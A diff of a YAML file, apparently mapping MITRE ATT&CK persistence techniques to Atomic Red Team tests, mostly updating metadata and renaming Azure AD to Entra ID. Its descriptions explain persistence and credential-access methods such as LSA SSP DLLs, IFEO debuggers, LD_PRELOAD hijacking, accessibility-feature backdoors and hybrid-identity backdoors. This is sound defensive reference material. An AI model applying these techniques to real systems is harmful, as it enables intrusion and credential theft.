         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -33271,11 +33701,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:41:16.110Z'
       name: 'Boot or Logon Autostart Execution: Shortcut Modification'
       description: |-
         Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -33288,7 +33717,6 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - David French, Elastic
       - Bobby, Filar, Elastic
@@ -33301,7 +33729,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -33331,7 +33758,8 @@ persistence:
         url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1547.009
     atomic_tests: []
   T1525:
@@ -33363,7 +33791,7 @@ persistence:
         url: https://github.com/RhinoSecurityLabs/ccat
         description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT).
           Retrieved September 12, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:27:49.094Z'
       name: Implant Internal Image
       description: |-
         Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
@@ -33385,8 +33813,6 @@ persistence:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1547.005:
     technique:
@@ -33412,7 +33838,7 @@ persistence:
         description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
           Retrieved June 24, 2015.
         source_name: Microsoft Configure LSA
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T15:42:48.910Z'
       name: 'Boot or Logon Autostart Execution: Security Support Provider'
       description: |-
         Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -33438,36 +33864,34 @@ persistence:
       - 'Windows Registry: Windows Registry Key Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.005
     atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -33475,9 +33899,9 @@ persistence:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -33486,21 +33910,22 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -33540,13 +33965,10 @@ persistence:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.004:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:48.453Z'
       name: 'Create or Modify System Process: Launch Daemon'
       description: |-
         Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -33623,7 +34045,6 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1543.004
     atomic_tests:
     - name: Launch Daemon
@@ -33709,7 +34130,7 @@ persistence:
           sudo rm /tmp/T1543_004_atomicredteam.txt
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -33728,6 +34149,7 @@ persistence:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -33735,7 +34157,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -33755,29 +34176,31 @@ persistence:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1505.003:
@@ -33854,12 +34277,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1505.003
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -33874,6 +34296,7 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -33882,18 +34305,18 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -33925,9 +34348,6 @@ persistence:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests:
     - name: Enable Guest Account on macOS
@@ -34010,7 +34430,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.003
     atomic_tests: []
   T1546.005:
@@ -34037,7 +34456,7 @@ persistence:
         url: https://bash.cyberciti.biz/guide/Trap_statement
         description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
           2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T16:43:02.273Z'
       name: 'Event Triggered Execution: Trap'
       description: |-
         Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.
@@ -34063,8 +34482,6 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.005
     atomic_tests:
     - name: Trap EXIT
@@ -34103,7 +34520,7 @@ persistence:
         name: sh
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -34224,7 +34641,6 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests:
     - name: Dylib Injection via DYLD_INSERT_LIBRARIES
@@ -34337,7 +34753,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.001
     atomic_tests:
     - name: Create a user account on a MacOS system
@@ -34436,7 +34851,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.004
     atomic_tests: []
   T1098.004:
@@ -34546,7 +34960,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.004
     atomic_tests:
     - name: Modify SSH Authorized Keys
@@ -34619,7 +35032,7 @@ persistence:
         description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
           18, 2017.
         source_name: Symantec Ushedix June 2008
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.112Z'
       name: 'Event Triggered Execution: Image File Execution Options Injection'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -34652,8 +35065,6 @@ persistence:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.012
     atomic_tests: []
   T1574.005:
@@ -34684,7 +35095,7 @@ persistence:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -34719,12 +35130,10 @@ persistence:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:18.602Z'
       name: 'Event Triggered Execution: Accessibility Features'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -34801,7 +35210,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.008
     atomic_tests: []
   T1136.002:
@@ -34855,7 +35263,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.002
     atomic_tests: []
   T1542.002:
@@ -34887,7 +35294,7 @@ persistence:
           health and make sure it's not already dying on you. Retrieved October 2,
           2018.
         source_name: ITWorld Hard Disk Health Dec 2014
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-01T20:43:55.632Z'
       name: Component Firmware
       description: |-
         Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -34917,55 +35324,10 @@ persistence:
       - SYSTEM
       x_mitre_system_requirements:
       - Ability to update component device firmware from the host operating system.
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1137.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
-      type: attack-pattern
-      created: '2019-11-07T20:29:17.788Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.001
-        url: https://attack.mitre.org/techniques/T1137/001
-      - url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
-        description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
-          Retrieved July 3, 2017.
-        source_name: Microsoft Change Normal Template
-      - url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
-        description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
-          Retrieved July 3, 2017.
-        source_name: MSDN VBA in Office
-      - url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
-        description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
-          Retrieved July 3, 2017.
-        source_name: enigma0x3 normal.dotm
-      - url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
-        description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
-          Retrieved July 3, 2017.
-        source_name: Hexacorn Office Template Macros
-      - source_name: GlobalDotName Jun 2019
-        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
-        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
-          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
-      - source_name: CrowdStrike Outlook Forms
-        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
-        description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
-          Movement and Persistence. Retrieved February 5, 2019.
-      - source_name: Outlook Today Home Page
-        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
-        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
-          Retrieved February 5, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:01:35.918Z'
       name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
@@ -34996,6 +35358,7 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: 'Many Office-related persistence mechanisms require changes
         to the Registry and for binaries, files, or scripts to be written to disk
         or existing files modified to include malicious scripts. Collect events related
@@ -35005,9 +35368,13 @@ persistence:
         also be investigated since the base templates should likely not contain VBA
         macros. Changes to the Office macro security settings should also be investigated.(Citation:
         GlobalDotName Jun 2019)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -35015,11 +35382,47 @@ persistence:
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
+      created: '2019-11-07T20:29:17.788Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/001
+        external_id: T1137.001
+      - source_name: MSDN VBA in Office
+        description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
+          Retrieved July 3, 2017.
+        url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
+      - source_name: Hexacorn Office Template Macros
+        description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
+          Retrieved July 3, 2017.
+        url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
+      - source_name: Microsoft Change Normal Template
+        description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
+          Retrieved July 3, 2017.
+        url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
+      - source_name: enigma0x3 normal.dotm
+        description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
+          Retrieved July 3, 2017.
+        url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
+      - source_name: CrowdStrike Outlook Forms
+        description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
+          Movement and Persistence. Retrieved February 5, 2019.
+        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+      - source_name: GlobalDotName Jun 2019
+        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+      - source_name: Outlook Today Home Page
+        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+          Retrieved February 5, 2019.
+        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.001
     atomic_tests: []
   T1546.009:
@@ -35051,7 +35454,7 @@ persistence:
         description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
           Retrieved December 18, 2017.
         source_name: Sysinternals AppCertDlls Oct 2007
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.052Z'
       name: 'Event Triggered Execution: AppCert DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -35099,13 +35502,11 @@ persistence:
       x_mitre_effective_permissions:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.009
     atomic_tests: []
   T1098.005:
     technique:
-      modified: '2023-10-03T17:38:39.065Z'
+      modified: '2024-09-25T20:39:53.597Z'
       name: Device Registration
       description: "Adversaries may register a device to an adversary-controlled account.
         Devices may be registered in a multifactor authentication (MFA) system, which
@@ -35118,16 +35519,16 @@ persistence:
         FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
         only a username and password to enroll the account's first device or to enroll
         a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
-        an adversary with existing access to a network may register a device to Azure
-        AD and/or its device management system, Microsoft Intune, in order to access
+        an adversary with existing access to a network may register a device to Entra
+        ID and/or its device management system, Microsoft Intune, in order to access
         sensitive data or resources while bypassing conditional access policies.(Citation:
         AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
-        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
         be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
         campaigns via intra-organizational emails, which are less likely to be treated
         as suspicious by the email client.(Citation: Microsoft - Device Registration)
         Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
-        on an Azure AD tenant by registering a large number of devices.(Citation:
+        on an Entra ID tenant by registering a large number of devices.(Citation:
         AADInternals - BPRT)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -35139,16 +35540,16 @@ persistence:
       - Mike Moran
       - Joe Gumke, U.S. Bank
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
       - Windows
-      - SaaS
-      x_mitre_version: '1.2'
+      - Identity Provider
+      x_mitre_version: '1.3'
